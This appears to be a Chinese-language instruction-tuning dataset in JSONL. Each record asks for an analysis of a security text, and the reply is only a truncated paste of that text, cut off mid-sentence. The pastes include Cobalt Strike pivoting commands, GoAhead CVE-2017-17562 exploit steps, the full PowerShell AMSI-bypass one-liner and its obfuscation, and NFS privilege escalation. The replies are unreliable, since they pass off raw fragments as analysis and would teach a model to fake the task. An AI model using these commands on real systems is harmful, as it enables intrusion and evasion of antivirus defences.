{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 0x00 端口转发 虽然他是集成在CS里面的工具 但是速度很慢很不问题建议还是使用其他成熟的工具ew之类的 这里就做个介绍 ``` beacon> help rportfwd Use: rportfwd [bind port] [forward host] [forward port] rportfwd stop [bind port] Binds the specified port on the target host. When a connection comes in, Cobalt Strike will make a connection to the forwarded host/port and use Beacon to relay traffic between the two connections. ``` >rportfwd 本机端口 目标ip 目标端口 然后本地使用 就是本机ip+本机端口 # 0x01 socks4 通过这些SOCKS服务器的所有连接都将变为连接读取写入和关闭任务状态以便执行相关的Beacon您可以通过SOCKS的任何类型的Beacon进行隧道传输 Beacon的HTTP数据通道对数据转发的响应最快如果您想通过DNS转发流量请使用DNS TXT记录通信模式 CS本身支持的是socks4代理貌似有脚本支持socks5他有2种用法一种是配合proxychains带入目标内网 一种是直接把msf带入目标内网 ``` beacon> help socks Use: socks [stop|port] Starts a SOCKS4a server on the specified port. This server will relay connections through this Beacon. Use socks stop to stop the SOCKS4a server and terminate existing connections. Traffic will not relay while Beacon is asleep. Change the sleep time with the sleep command to reduce latency. ``` 然后用proxychains 配合工具 ``` vi /etc/proxychains.conf socks4 xxx.xxx.xxx.xx 5566 ``` 配合msf 找到view >proxy pivots ![Cobalt Strike ](./img/10.1.png) 然后打开msf 设置即可 ![Cobalt Strike ](./img/10.2.png) msf 中 unsetg Proxies来停止此执行 # 0x02 Covert VPN ### 部署Covert VPN 要激活Covert VPN右键单击受控的主机 Pivoting - > Deploy VPN选择您希望Covert VPN绑定到的远程接口如果没有本地接口请选择Add来创建 ![Cobalt Strike ](./img/10.3.png) >clone host mac address 检查克隆主机MAC地址使本地接口与远程接口具有相同的MAC地址 选择Deploy在目标上启动Covert VPN客户端Covert VPN需要管理员访问才能部署 一旦Covert VPN接口被激活您就可以像使用系统上的任何物理接口一样使用它使用ifconfig配置其IP地址如果目标网络具有DHCP服务器则可以使用操作系统的内置工具从该服务器请求IP地址 ### 管理接口 要管理您的Covert VPN接口请进入到Cobalt Strike - > Interfaces在这里Cobalt Strike将显示Covert VPN接口它们的配置方式以及通过每个接口传输和接收的字节数突出显示一个接口然后选择Remove清除该接口并关闭远程Covert VPN客户端Covert VPN将在重新启动时删除其临时文件并立即自动撤消任何系统更改 选择Add 以配置新的Covert VPN接口 ### 配置接口 Covert VPN接口包括一个网路分流器(Network Tap)和一个通过以太网帧进行通信的通道要配置接口请选择接口名称这是稍后通过ifconfig操作的内容和MAC地址 ![Cobalt Strike ](./img/10.4.png) ### VPN接口设置 您还必须为您的接口配置Covert VPN通信通道Covert VPN可以通过UDP连接TCP连接ICMP或使用HTTP协议来通信以太网帧TCP反向通道的目标连接到Cobalt ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# GoAhead Web Server HTTPd 'LD_PRELOAD' Remote Code Execution (CVE-2017-17562) [中文版本(Chinese version)](README.zh-cn.md) Embedthis GoAhead is the world's most popular, tiny embedded web server, which is deployed in hundreds of millions of devices and is ideal for the smallest of embedded devices. GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. This is a result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters in the cgiHandler function in `cgi.c`. When combined with the glibc dynamic linker, this behaviour can be abused for remote code execution using special parameter names such as `LD_PRELOAD`. An attacker can POST their shared object payload in the body of the request, and reference it using /proc/self/fd/0. References: - https://www.elttam.com.au/blog/goahead/ - https://www.exploit-db.com/exploits/43360 - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/goahead_ldpreload.rb ## Vulnerable environment Execute following commands to start a GoAhead 3.6.4: ``` docker compose up -d ``` Then, you can see the welcome page at `http://your-ip:8080`, CGI scripts is available at `http://your-ip:8080/cgi-bin/index`. ## Exploit First of all, compile this hijack code to a dynamic shared library: ```C #include <unistd.h> static void before_main(void) __attribute__((constructor)); static void before_main(void) { write(1, \"Hello: World!\\n\", 14); } ``` > Please notice that, since GoAhead is a compact embedded webserver running on almost any possible IoT device, the format of dynamic shared library is always depending on the target server architecture. In the real world, compiling exploits is not as easy as this manual suggests, although Vulhub could show you a simplest example. Compile on a x86/64 environment: ``` gcc -shared -fPIC ./payload.c -o payload.so ``` Use curl to trigger the attack: ``` curl -X POST --data-binary @payload.so \"http:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: masscan categories: Information Gathering tags: [masscan,portscanning,information gathering,kali linux,recon] date: 2017-04-23 11:03:41 --- 0x00 介绍 ------- 视频介绍[https://asciinema.org/a/31820][1] masscan目前是最快的互联网端口扫描器最快可以在六分钟内扫遍互联网 masscan的扫描结果类似于nmap(一个很著名的端口扫描器)在内部它更像scanrand, unicornscan, and ZMap采用了异步传输的方式它和这些扫描器最主要的区别是它比这些扫描器更快而且masscan更加灵活它允许自定义任意的地址范和端口范围 <!--more--> [主页][2] | [仓库][3] - 作者Robert Graham - 证书GPLv2 0x01 功能 ------- masscan - 异步TCP端口扫描器 ```plain root@kali:~# masscan 用法: masscan -p80,8000-8100 10.0.0.0/8 --rate=10000 扫描一些Web端口10.x.x.x以每秒10000发包速率 masscan --nmap 列出与nmap兼容的选项 masscan -p80 10.0.0.0/8 --banners -oB <filename> 将二进制格式的扫描结果保存到<filename> masscan --open --banners --readscan <filename> -oX <savefile> 读取二进制扫描结果<filename>并将其保存为xml格式<savefile> ``` 0x02 更多参数 ------- ```plain <ip/range> IP地址范围有三种有效格式 1单独的IPv4地址 2类似\"10.0.0.1-10.0.0.233\"的范围地址 3CIDR地址 类似于\"0.0.0.0/0\"多个目标可以用都好隔开 -p <ports,--ports <ports>> 指定端口进行扫描 --banners 获取banner信息支持少量的协议 --rate <packets-per-second> 指定发包的速率 -c <filename>, --conf <filename> 读取配置文件进行扫描 --echo 将当前的配置重定向到一个配置文件中 -e <ifname> , --adapter <ifname> 指定用来发包的网卡接口名称 --adapter-ip <ip-address> 指定发包的IP地址 --adapter-port <port> 指定发包的源端口 --adapter-mac <mac-address> 指定发包的源MAC地址 --router-mac <mac address> 指定网关的MAC地址 --exclude <ip/range> IP地址范围黑名单防止masscan扫描 --excludefile <filename> 指定IP地址范围黑名单文件 --includefile-iL <filename> 读取一个范围列表进行扫描 --ping 扫描应该包含ICMP回应请求 --append-output 以附加的形式输出到文件 --iflist 列出可用的网络接口然后退出 --retries 发送重试的次数以1秒为间隔 --nmap 打印与nmap兼容的相关信息 --http-user-agent <user-agent> 设置user-agent字段的值 --show [open,close] 告诉要显示的端口状态默认是显示开放端口 --noshow [open,close] 禁用端口状态显示 --pcap <filename> 将接收到的数据包以libpcap格式存储 --regress 运行回归测试测试扫描器是否正常运行 --ttl <num> 指定传出数据包的TTL值默认为255 --wait <seconds> 指定发送完包之后的等待时间默认为10秒 --offline 没有实际的发包主要用来测试开销 -sL 不执行扫描主要是生成一个随机地址列表 --readscan <binary-files> 读取从-oB生成的二进制文件可以转化为XML或者JSON格式. --connection-timeout <secs> 抓取banners时指定保持TCP连接的最大秒数默认是30秒 ``` 0x03 教程 ------- [Masscan最快的互联网IP端口扫描器][4] [Kali下masscan的使", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypass AMSI的前世今生(3) - 脚本混淆和一行命令关闭AMSI 0x00 前言 本文的主要讲解[BA2-3]也就是脚本混淆和一行命令关闭AMSI的原理而不是具体的脚本混淆方法 混淆方法其实就是对脚本语法的理解然后加入各种额外字符或换一种表示方法混淆姿势细致繁复 并且在网上已有比较全面的脑图和总结文章在此就没必要重复了相关推荐资料会在文末贴出本文 主要分为以下几个部分 为什么脚本混淆能够过AMSI 一行命令关闭AMSI原理 [BA2]和[BA3]配合达到关闭AMSI的作用 学习建议工具和相关资料推荐 0x01 为什么脚本混淆能够过AMSI 脚本混淆能够过AMSI这句话其实是不正确的本系列第一篇文章中已经解释过了AMSI其实只是一个 通道真正识别是否是恶意软件或脚本的还是杀毒软件例如defender因此脚本混淆欺骗的是杀 毒软件的特征库当然具体杀毒软件怎么来识别有很多种方法 AMSI把我们的恶意脚本交给杀毒软件杀毒软件做识别目前大部分的识别方式还是特征码的方式当 然杀毒软件也会把样本传到云端做机器学习或者人工分析最后再反馈特征库给杀毒软件导致我们恶 意脚本被杀这也就是为什么我们能过一时杀软但是几天后也就被杀了的原因 脚本混淆能够过AMSI准确的说应该是脚本混淆能够过杀毒因此脚本混淆能不能有用取决于杀软厉 不厉害但当前脚本混淆依旧有用是因为大部分杀软对恶意脚本的侦测还是特征码 0x02 一行命令关闭AMSI原理 通过0x01我们知道AMSI只是一个通道我们把这个通道掐断也就阻断了杀毒软件的侦测而Matt Graeber在16年提出了一种方法 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-22 No. 1 / 4 - Welcome to www.red-team.cn 原理已经被很多文章分析https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-loggi ng-evasion/具体的小伙伴可以阅读以上文章简单的说就是利用反射直接把判断是否要使用杀毒软件 进行扫描的变量始终改成false这样AMSI就不会把我们的恶意脚本交给杀毒软件而是直接返回 AMSI_RESULT_NOT_DETECTED  0x03 结合上面2种方法关闭AMSI 通过以上我们知道混淆是能够过杀毒软件的通过一行命令是可以掐断AMSI通道了由于这一行命令 也是脚本自身会被AMSI传递给杀毒软件并被查杀因此我们结合以上2中方法通过混淆一行命 令来过杀软并掐断AMSI通道这样我们再执行任何恶意脚本都不会被传递给杀毒 下面我们来实践一下 测试环境 Windows 10 21H110.0.19043.1237 Powershell 5.1.19041.1237 Defender 1.349.1192.0 (2021/09/22) 原始脚本 根据这个脚本如果把特征提取在函数上很容易造成误报因此很有可能特征是在 System.Management.Automation.AmsiUtils 和 amsiInitFailed 上我们去掉测试一下 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiI nitFailed','NonPublic,Static').SetValue($null,$true) [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiI nitFailed','NonPublic,Static').SetValue($null,$true) Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-22 No. 2 / 4 - Welcome to www.red-team.cn 我偷个懒前段时间在星球发了一个混淆脚本,但是目前已经不能过了 我们对这个脚本进行拆解 这段bypass的核心思想也就是对 System.Management.Automation.AmsiUtils 和 amsiInitFailed 的 关键字符进行编码解码我只是对脚本进行了拆解发现就已经能过了 $A=\"5492868772801748688168747280728187173688878280688776828\" $B=\"1173680867656877679866880867644817687416876797271\" [Ref].Assembly.GetT", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAuthor:@Y4er.com 调用关系查询 分析 com.imc.iview.network.NetworkServlet#doPost 两次校验 com.imc.iview.utils.CUtils#checkFileNameIncludePath(java.lang.String) MATCH (n:Class{NAME:'javax.servlet.http.HttpServlet'})-[:EXTEND]-(c:Class)- [:HAS]->(m:Method)-[:CALL*2]- (m1:Method{NAME:'exec',CLASS_NAME:'java.lang.Runtime'}) return * 检验 \\webapps\\ 防止写shell com.imc.iview.utils.CUtils#checkSQLInjection 检测了一些关键字 public boolean checkSQLInjection(String model0) { boolean result = false; String model = model0.toLowerCase(); if (!model.contains(\" or \") && !model.contains(\"'or \") && !model.contains(\"||\") && !model.contains(\"==\") && !model.contains(\"--\")) { if (model.contains(\"union\") && model.contains(\"select\")) { if (this.checkCommentStr(model, \"union\", \"select\")) { result = true; } } else if (model.contains(\"case\") && model.contains(\"when\")) { if (this.checkCommentStr(model, \"case\", \"when\")) { result = true; } } else if (model.contains(\"into\") && model.contains(\"dumpfile\")) { if (this.checkCommentStr(model, \"into\", \"dumpfile\")) { result = true; } } else if (model.contains(\"into\") && model.contains(\"outfile\")) { if (this.checkCommentStr(model, \"into\", \"outfile\")) { result = true; } } else if (model.contains(\" where \") && model.contains(\"select \")) { result = true; } else if (model.contains(\"benchmark\")) { result = true; } else if (model.contains(\"select\") && model.contains(\"from\")) { if (this.checkCommentStr(model, \"select\", \"from\")) { result = true; } } else if (model.contains(\"select/*\")) { result = true; } else if (model.contains(\"delete\") && model.contains(\"from\")) { if (this.checkCommentStr(model, \"delete\", \"from\")) { result = true; } } else if (model.contains(\"drop\") && model.contains(\"table\") || model.contains(\"drop\") && model.contains(\"database\")) { if (this.checkCommentStr(model, \"drop\", \"table\")) { result = true; } if (this.checkCommentStr(model, \"drop\", \"database\")) { 那么mysqldump可以拼接 -w 参数将内容写入文件然后可以多次传递 -r 参数覆盖原有的 -r 文件路径值 正常的命令为 命令注入构造payload result = true; } } else if (!model.co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Text rendering is hard * Category: Misc. * 200 Points * Solved by the JCTF Team ## Description > Looking for text in the PDF structure is much like looking for the Cheshire Cat. It's almost completely invisible, only leaving trace hints that the file even contains text to those unfamiliar with the structure. > > Try to understand how text is stored in PDF files and what happens when you tweak different parts to find the cipher key. A PDF file was attached. ## Solution We get a PDF file with the following text: ``` It was all very well to say SUBSTITUTE me but the wise little Alice was not going to do that in a hurry No Ill look first she said and see whether its marked CMAP or fURmURS!cu ODcdg! DOBNx ``` Well, we have some garbled text at the end, and there's a very thick hint towards a substitution cipher. We can clearly test that using the flag format: ``` fURmUR INTENT ``` So we just need to find the key. Using `peepdf` we can browse the PDF internal objects, and find the following entry: ```console (user@kali)-[/media/sf_CTFs/intent/Text_rendering_is_hard] $ python2 ~/utils/forensics/peepdf/peepdf.py -C \"object 8\" Text_rendering_is_hard.pdf << /Length 564 /Filter /FlateDecode >> stream /CIDInit/ProcSet findresource begin 12 dict begin begincmap /CIDSystemInfo<< /Registry (Adobe) /Ordering (UCS) /Supplement 0 >> def /CMapName/Adobe-Identity-UCS def /CMapType 2 def 1 begincodespacerange <00> <FF> endcodespacerange 81 beginbfchar <01> <0061> <15> <02> <0062> <14> <03> <0063> <27> <04> <0064> <28> <05> <0065> <0E> <06> <0066> <0A> <07> <0067> <34> <08> <0068> <3A> <09> <0069> <3E> <0A> <006A> <47> <0B> <006B> <4A> <0C> <006C> <49> <0D> <006D> <2A> <0E> <006E> <29> <0F> <006F> <07> <10> <0070> <39> <11> <0071> <20> <12> <0072> <43> <13> <0073> <4C> <14> <0074> <03> <15> <0075> <12> <16> <0076> <4F> <17> <0077> <45> <18> <0078> <01> <19> <0079> <21> <1A> <007A> <44> <1B> <0041> <16> <1C> <0042> <30> <1D> <0043> <38> <1E> <0044> <05> <1F> <0045> <0D> <20> <0046> <02>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDDoS Protecion Total AnnihilationD DDoS Mitigation Lab A DDoS Mitigation Lab Independent academic R&D division of Nexusguard building next generation DDoS mitigation knowledge and collaborate with defense community. Industry body formed to foster synergy among stakeholders to promote advancement in DDoS defense knowledge. DDoS Mitigation Lab DDoS Mitigation Lab  DDoS Relevance, Attack Categories, Detection & Mitigation  Source Host Verification: Authentication Methods  TCP SYN Auth  HTTP Redirect Auth  HTTP Cookie Auth  JavaScript Auth  CAPTCHA Auth  PoC Tool  TCP Traffic Model  HTTP Traffic Model DDoS Mitigation Lab Size Bandwidth > 20Gbps Complexity Layer 7 > 30% Frequency Attack > 2.5mil per year Cost Lost > US$6M per hour!! Source: NTT Communications, Successfully Combating DDoS Attacks (Aug 2012) DDoS Mitigation Lab Volumetric Semantic Blended DDoS Mitigation Lab DDoS Mitigation Lab DDoS Mitigation Lab SYN ACK SYN ACK RST SYN SYN ACK ACK  DDoS Mitigation Lab RST SYN SYN ACK SYN SYN ACK ACK  DDoS Mitigation Lab GET /index.html HTTP 302 redir to /foo/index.html GET /foo/index.html HTTP 302 redir to /index.html GET /index.html  DDoS Mitigation Lab GET /index.html HTTP 302 redir to /index.html HTTP 302 redir to /index.html GET /index.html GET /index.html  DDoS Mitigation Lab GET /index.html HTTP 302 redir to /index.html [X-Header: foo=bar] GET /index.html [X-Header: foo=bar] GET /index.html [X-Header: foo=bar] HTTP 302 redir to /index.html [X-Header: foo=bar]  GET /index.html [X-Header: foo=bar] DDoS Mitigation Lab GET /index.html HTTP 302 redir to /index.html GET /index.html POST /auth.php ans=16 JS 7+nine=?  DDoS Mitigation Lab GET /index.html HTTP 302 redir to /index.html GET /index.html POST /auth.php  DDoS Mitigation Lab c DDoS Mitigation Lab c DDoS Mitigation Lab c DDoS Mitigation Lab Number of Connections Connection Hold Time Before 1st Request Connection Idle Timeout After Last Request Connections Interval Connections Interval DDoS Mitigation Lab c DDoS Mit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlack Hat USA 2007 Tactical Exploitation Tactical Exploitation the other way to pen-test  the other way to pen-test  hdm / valsmith hdm / valsmith Black Hat USA 2007 who are we ? who are we ? H D Moore <hdm [at] metasploit.com> BreakingPoint Systems || Metasploit Valsmith <valsmith [at] metasploit.com> Offensive Computing || Metasploit Black Hat USA 2007 why listen ? why listen ?  A different approach to pwning  New tools, fun techniques  Real-world tested :-) Black Hat USA 2007 what do we cover ? what do we cover ?  Target profiling  Discovery tools and techniques  Exploitation  Getting you remote access Black Hat USA 2007 the tactical approach the tactical approach  Vulnerabilites are transient  Target the applications  Target the processes  Target the people  Target the trusts  You WILL gain access. Black Hat USA 2007 the tactical approach the tactical approach  Crackers are opportunists  Expand the scope of your tests  Everything is fair game  What you dont test...  Someone else will. Black Hat USA 2007 the tactical approach the tactical approach  Hacking is not about exploits  The target is the data, not r00t  Hacking is using what you have  Passwords, trust relationships  Service hijacking, auth tickets Black Hat USA 2007 personnel discovery personnel discovery  Security is a people problem  People write your software  People secure your network  Identify the meatware first Black Hat USA 2007 personnel discovery personnel discovery  Identifying the meatware  Google  Newsgroups  SensePost tools  www.Paterva.com Black Hat USA 2007 personnel discovery personnel discovery  These tools give us  Full names, usernames, email  Employment history  Phone numbers  Personal sites Black Hat USA 2007 personnel discovery personnel discovery CASE STUDY Black Hat USA 2007 personnel discovery personnel discovery  Started with no information but CO name and function  Found online personnel directory  Found people / email addresses  Email name = username = target Black Hat USA 20", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup InsomniHack CTF 2017 Team: msm, rev, shalom, akrasuski1, nazywam, c7f.m0d3, cr01283 ### Table of contents * [bender_safe](bender_safe) * [internet_of_fail](internet_of_fail) * [mindreader](mindreader) * [cryptoquizz](cryptoquizz) * [the_great_escape1](the_great_escape1) * [the_great_escape2](the_great_escape2)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLets talk about SOAP, baby. Lets talk about UPnP. Ricky HeadlessZeke Lawshae  DEFCON 23 Who am I?  Security Researcher for HP TippingPoints DVLabs team  At Rapid7 before that, and BreakingPoint before that  Speaker at Defcon, Recon, Insomnihack, and Ruxcon  Voider of warranties  Reader of comic books  Drinker of beers  TRIVIA: I once got a job at a police department while I had 4 active warrants out for my arrest. What are we talking about?  The Internet of Things (ugh)  Its here, whether you like it or not  Just put a network interface on it. Well worry about why later.  Smart devices arent very smart  Need simple way to talk to each other  Ease-of-use: Get the tech out of the way of UX  Often accomplished with SOAP/UPnP services  Super talkative  Happily tell you all their capabilities in a well-structured format  Also, dont bother themselves with pesky issues like security What are we talking about?  UPnP  Universal Plug and Play  SSDP  Simple Service Discovery Protocol  SCPD  Service Control Protocol DeBnition  SOAP  Simple Object Access Protocol Lets talk about all the good things UPnP  1900/UDP  HTTP over UDP allowing devices to discover each other  Multicast 239.255.255.250  UPnP Stack[1]  Discovery  Advertising and Searching  Description  An XML Ble describing the device  Control  Call an action or query for a value  Eventing  Used for announcing state changes  Presentation  UIweb page or management portal I guess? [1] http://www.upnp.org/specs/arch/UPnP-arch-DeviceArchitecture-v1.0-20080424.pdf UPnP  Discovery All you need to know about discovery. Also, this is the really noisy part. UPnP  Discovery All you need to know about discovery. Also, this is the really noisy part. UPnP  Description  XML Ble usually hosted on a high number TCP port  Version info  upnp.org spec  Usually just 1.0  Device deBnitions  Device type  Make/model/UUID  Service list  Service type  SCPD URL  Control URL  Event URL UPnP  Description <specVersion> <major>1</major> <minor>0</mino", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2020/9/25 Linux提权姿势二利用NFS提权 https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&tempkey=MTA4MF95ZVZHaittcHd5aEVSN0dCcmZLUkk1ekhBRi1Sb2JicDBqQ20tU 1/6 Linux提权姿势二利用NFS提权 如果在服务器上具有低特权shell并且发现服务器中具有NFS共享则可以使用它来升级特权但是成功 取决于它的配置方式 目录 什么是NFS 网络文件系统NFS是一个客户端/服务器应用程序它使计算机用户可以查看和选择存储和更新远程 计算机上的文件就像它们位于用户自己的计算机上一样在 NFS 协议是几个分布式文件系统标 准网络附加存储NAS之一 NFS是基于UDP/IP协议的应用其实现主要是采用远程过程调用RPC机制RPC提供了一组与机器操作 系统以及低层传送协议无关的存取远程文件的操作RPC采用了XDR的支持XDR是一种与机器无关的数 据描述编码的协议他以独立与任意机器体系结构的格式对网上传送的数据进行编码和解码支持在异构 系统之间数据的传送 什么是root_sqaush和no_root_sqaush Root Squashingroot_sqaush参数阻止对连接到NFS卷的远程root用户具有root访问权限远程根用 户在连接时会分配一个用户 nfsnobody 它具有最少的本地特权如果 no_root_squash 选项开启 的话并为远程用户授予root用户对所连接系统的访问权限在配置NFS驱动器时系统管理员应始终使 用 root_squash 参数 注意要利用此no_root_squash 选项得开启 利用NFS并获取Root Shell 现在我们拿到了一个低权限的shell我们查看 / etc / exports 文件 / etc / exports 文件包含将哪些文件夹/文件系统导出到远程用户的配置和权限 这个文件的内容非常简单每一行由抛出路径客户名列表以及每个客户名后紧跟的访问选项构成 [共享的目录] [主机名或IP(参数,参数)] 1 2 3 4 1.什么是NFS 2.什么是root_sqaush和no_root_sqaush 3.所需的工具和程序文件 4.利用NFS弱权限 1 2 3 4 其中参数是可选的当不指定参数时nfs将使用默认选项默认的共享选项是 sync,ro,root_squ 当主机名或IP地址为空时则代表共享给任意客户机提供服务 当将同一目录共享给多个客户机但对每个客户机提供的权限不同时可以这样 [共享的目录] [主机名1或IP1(参数1,参数2)] [主机名2或IP2(参数3,参数4)] 李木 黑白天 今天 2020/9/25 Linux提权姿势二利用NFS提权 https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&tempkey=MTA4MF95ZVZHaittcHd5aEVSN0dCcmZLUkk1ekhBRi1Sb2JicDBqQ20tU 2/6 我们可以看到/ tmp 文件夹是可共享的远程用户可以挂载它 还有不安全的参数 rw 读写 sync 和 no_root_squash  同样我们也可以使用 showmount命令来查看 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 showmount命令用于查询NFS服务器的相关信息 # showmount --help Usage: showmount [-adehv] [--all] [--directories] [--exports] [--no-headers] [--help] [--version] [host] -a或--all 以 host:dir 这样的格式来显示客户主机名和挂载点目录 -d或--directories 仅显示被客户挂载的目录名 -e或--exports 显示NFS服务器的输出清单 -h或--help 显示帮助信息 -v或--version 显示版本信 --no-headers 禁止输出描述头部信息 显示NFS客户端信息 # showmount 显示指定NFS服务器连接NFS客户端的信息 # showmount 192.168.1.1 #此ip为nfs服务器的 显示输出目录列表 # showmount -e 2020/9/25 Linux提权姿势二利用NFS提权 https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&tempkey=MTA4MF95ZVZHaittcHd5aEVSN0dCcmZLUkk1ekh", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n优化ARL的些坑的细节 0x00 前 这篇章主要是针对前那篇关于漏扫优化的具体实践实践时候也碰到了些预想不到的问题包 括系列ARL身的bug问题觉得有必要记录下也避免哪天硬盘挂了没备份忘记了怎么修改 的 0x01 如何部署和调试代码 我通常是不进单步调试的毕竟ARL是python写的有报错看报错然后打印打印关键信息基本 我就知道哪有问题要怎么改了 我按照官的安装式是键部署的docker版本通过docker-compose来进管理 可以看到分为好个容器除了db和mq剩下三个应该都是有具体ARL代码的我们前所说 的例如增加host碰撞增加扫描等实际上都是在arl_worker这个容器因此当我们对代码做修改 时其实只需要覆盖掉worker容器的具体执的py代码就了当然为了减少问题每次对代码 修改可以同时覆盖这三个容器的ARL代码使他们保持致 如我们修改了这个services的altDNS.py这个时候我们只需要把这个services的件夹复制到 worker容器直接覆盖就了 像这样把本地的修改过的services件夹复制到容器的app录下覆盖掉的services件夹 就完成了次代码修改更新之后我们只需要restart下容器即可 docker-compose restart worker 不重启的话修改不会效 修改完重新跑容易报错这时候我们需要做些简单的排查如先多看看restart后容器是不是 up如果报错了可能会不停的处于restart状态 如果遇到执错误了这时候我们看看报了什么错 docker-compose logs 再在志寻找报错信息基本上就可以找到哪代码报错了像上这样 修改错误后重新复制容器就会正常了还有个志也要注意 项录下两个log是映射的容器内的两个志这也会有些其他的错误志可以看经常看 志可以对实际运情况进了解也能找到很多arl身的bug 0x02 修复个ARL的隐藏bug 1 这个bug只有在进时间重型扫描任务时才会出现它会导致扫描任务假死处于永远的进 中 在运了很时间没有结束的任务时你可能会从志找到这个报错如果有这个报错那么它会 导致你任务直卡着不会结束 https://groups.google.com/g/celery-users/c/5dPhSfF5APQ https://stackoverflow.com/questions/67907336/celery-task-with-a-long-eta-and-rabbitmq 参考这个帖概可能是rabbitmq提前触发默认超时报错了导致celery的任务卡在那边解 决式是修改rabbitmq的配置 https://www.rabbitmq.com/consumers.html#acknowledgement-modes 我们进到rabbitmq的容器在rabbitmq的配置录下创建个advanced.config件写上 的配置内容把超时时间改成undefined修改完成后restart下容器就会效了 0x03 修复个ARL的隐藏bug 2 在app->utils->conn.py的http_req函数有个bug这conn如果遇到链接错误没有做异常捕获会 导致上层调的进程直接报错退出 我在fileleak这看到的这个报错因此我直接在这加了异常捕获如果不加基本上扫描次 次会中断报错 0x04 集成xray时候的问题 xray的集成废了好的劲有些坑吧我也不知道我解决的对不对总之按照我的式算是解决 了 xray在执的时候会寻找录的配置件我们是通过arl来执的xray所以录的相对位置会 有定影响具体过程我就不说了我是这样解决的 把这三个yaml放到arl主录然后还有xray的主件夹在主件我们在放要的 config再通过参数来指定config.yaml的位置这样执就不会报错了如果没有把这三个yaml件 放在根录是会报错的 其次xray在容器内执依赖于个libpcap.so解决式是把Linux正常的复制到容器的lib 录下 这两个做完后xray的执基本上是不会有问题了 接下来是arl和xray对接的些细节问题之前说过把xray的json格式输出后对接到nuclei的字段 整体处理思路是没有问题的但是xray的json输出很的问题在于字段不太固定它不像 nuclei样如果个字段没有值会置空是直接没有这个键值因此我们在映射的时候可能会遇 到json获取键值获取不到直接报错的问题 这点确实要吐槽太坑了我前是这样做的 实现效果 验证命令这会展示完整的请求和响应直接复制出来贴到vscode看就了 还算是较便的就是xray可能误报较多需要进步优化下 0x05 总结 基本这样就够了后重点在指纹收集录爆破和合理的扫描策略上进优化即可", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStrategic Cyber Security An Evaluation of Nation-State Cyber Attack Mitigation Strategies Kenneth Geers NCIS Cyber SME Free download: ccdcoe.org/278.html About me  2011-: NCIS Cyber Subject Matter Expert  2007-2011: NATO Cyber Centre, Estonia  2001-2007: NCIS Cyber Analysis (Div Chief)  19992001: SAIC Security Studies Web/VB Dev  19932002: USAR SIGINT Analyst, NSA National Security Perspective  All conflicts now have a cyber dimension  Tactical: espionage, propaganda, DoS, CIP  Strategic: terror / war ?  Strategic problems req strategic solutions  Nation-state, international  Beyond tactical, temporary fixes Research Question How to prioritize nation-state cyber attack mitigation strategies? 1. Next-Generation Internet: IPv6 2. Sun Tzus Art of War 3. Cyber attack deterrence 4. Cyber arms control Research Outline 1 1. Cyber security Technical discipline to strategic concept 2. Technical primer Hacking, security analysis, simulations 3. Real-world impact Internal security, internatl conflict, case studies Research Outline 2 4. Threat mitigation strategies Technical, military, political 5. DEMATEL method Strategic analysis / calculate indirect influence 6. Strategy prioritization Recommendation to policymakers Cyber Attack Mitigation Strategies  IPv6  Art of War  Deterrence  Arms control  Technical  Military  Military / Political  Political / Technical An IPv6 address in hexadecimal 2001:0DB8:AC10:FE01:0000:0000:0000:0000 Zeroes can be omitted: 2001:0DB8:AC10:FE01:: 0010000 000000001:0000110110111000:1010110000010000:1111111000000001: 0000000000000000:00000 00000000000:0000000000000000:0000000000000000:0000000000 Internet Protocol version 6 (IPv6)  Reduces anonymity  China: Everyone US: Everything  Limitless IPs, NAT not required  Security game-changer  Native IPSec: authentication, encryption  No silver bullet  SW/users still vulnerable 孫 子 兵 法 Sun Tzus Art of War Good  not perfect guide to cyber conflict Art of Cyber War 1. Artificial environment 2. Geography changes witho", "category": "text_analysis", "source": "security_papers"}
